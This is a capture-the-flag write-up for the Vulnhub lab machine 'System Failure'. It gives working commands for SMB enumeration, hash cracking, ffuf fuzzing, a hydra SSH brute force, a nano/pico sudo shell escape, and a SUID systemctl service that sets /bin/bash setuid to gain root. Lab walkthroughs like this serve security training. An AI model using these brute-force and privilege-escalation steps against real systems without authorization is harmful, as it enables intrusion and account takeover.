System Failure Walkthrough – Vulnhub – Writeup
System Failure is a medium machine from Vulnhub by the author 0xJin. This machine requires a bit of knowledge of sysadmin. However, the author of the machine might have unintentionally misconfigured this machine that allows us to escape several steps. This would definitely make it easy to do the machine. Nevertheless, I am going to walk you through the other way and mention the possible unintended misconfiguration. “System Failure Walkthrough – Vulnhub – Writeup”.
Link to the machine: https://www.vulnhub.com/entry/system-failure-1,654/
Identify the target
First of all, we have to identify the IP address of the machine.
fping -aqg 10.0.2.0/24
Scan open ports
Then, we have to check the open ports on the target machine.
sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.52
Here, we can see that we have SMB, FTP, SSH and HTTP services available on the target. Also, we don’t have anonymous access to the FTP service. Hence, we can check if there any shares in the SMB service that we can access anonymously.
SMB enumeration
I like to use smbmap because it shows us the permissions on the shares.
smbmap -H 10.0.2.52
There is a share “anonymous” that has read and write access. So, we can log into it.
smbclient -N \\\\10.0.2.52\\anonymous
You can see that, there is a file “share” which I downloaded on my local machine. Upon opening the file, we can see a message from the admin.
cat share
It says that the user has left his login credentials to the FTP server. At the end of the message, we can see a hash. We can crack the hash using https://crackstation.net.
The hash is an NTLM hash and it successfully cracked it. However, we still don’t know the username. Now, we can guess that the username might be admin. But, to be sure, we can enumerate SMB further.
enum4linux -a 10.0.2.52 | tee smb.log
There are four users on the machine, one of which is admin. So, using the credentials, I could log into the FTP server.
lftp -u admin,__password__ 10.0.2.52
Now, at this point, I am going to explain what might be unintentional here. The author has used the same password for the user admin in the SSH service. So, you can log in as the user admin and explore the /var/www/html directory for further enumeration. Similarly, the user admin has access to the files of the whole machines using the FTP client. So, even if the user didn’t have access to the SSH service, he would still see the required files. This surely simplifies what I am going to show you further.
Anyway, I am going to see the content of the home directory first. Only the “Syst3m” directory is not empty. Similarly, it has a text that has some messages and some files inside the directory “F4luR3”. So, I downloaded the files as follows.
I had created a directory “failures” on my local machine. By using ‘lcd’, I changed my local directory to failures. Upon looking at the files, they all looked similar with very few differences. Hence, I combined all these files into a single file.
cat failures/* > combined.txt
more combined.txt
Since most of the words are repeated we can extract unique words.
grep -o -E '\w+' combined.txt | sort -u -f
Upon searching through the output, we get an encoded message.
This doesn’t have “/” or “=” characters but has lowercase, uppercase and numbers. So, we can guess that this is a base62. However, we can check one by one from the cyber chef online tool. Anyway, it gave me a path.
HTTP enumeration
The main page doesn’t have much information.
When I used the previously found path on this page, it gave me a 404 error. Hence, I have to do the fuzzing.
ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.2.52/FUZZ -e .html,.php,.txt,.bak -of html -o dir.html
This gave us a path “area4”. When I happened the decoded path to this, we get a valid page.
However, if you had gone through SSH, you have the access to these files already and you don’t have to do all of these steps. That’s why I think those were unintentional misconfigurations.
Moving further, there is a note and a wordlist on the path.
The note says that not everything goes the right way. I tried bruteforcing the normal way and it didn’t give me any password. So, I used the additional options. Since I have already found out the users from SMB enumeration, I copied them in a new file “users”.
hydra -L users -P useful.txt 10.0.2.52 ssh -t 4 -V -u -e nsr
And, that gave me the password of the user valex.
ssh valex@10.0.2.52
ls -al
cat user.txt
Finally, we can get the user flag on the home directory.
Escalate to jin
When we see the sudo permissions of the user valex, we can see that he can execute a binary pico as the user jin.
sudo -l
The application was nothing but a copy of nano. And, nano allows executing commands as well.
Reference: https://gtfobins.github.io/gtfobins/nano/
sudo -u jin pico
^R^X
reset; bash 1>&0 2>&0
And, we got the shell.
resetOn the home directory of the user jin, we got our second flag.
cd
ls -al
cat user2.txt
The user has left a message on the file secret.txt.
cat secret.txt
Reminder: I had left something in /opt/system
This is a rabbit hole.
Then, I checked the SUID binaries from the use jin.
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
We have systemctl as a SUID binary. Therefore, we can create a service that allows us to get root access. You can spawn a reverse shell, however, I am going to give the bash shell setuid permission.
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=chmod +s /bin/bash
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
The execution is successful and now since I have the bash binary as SUID, I can easily get the root access.
bash -p
Next, I captured the flag.
cat root.txt
The user suggests that one has to get access to jin. Since I have got access to jin, this is valid for me. Anyway, the user has put a different flag on the same directory.
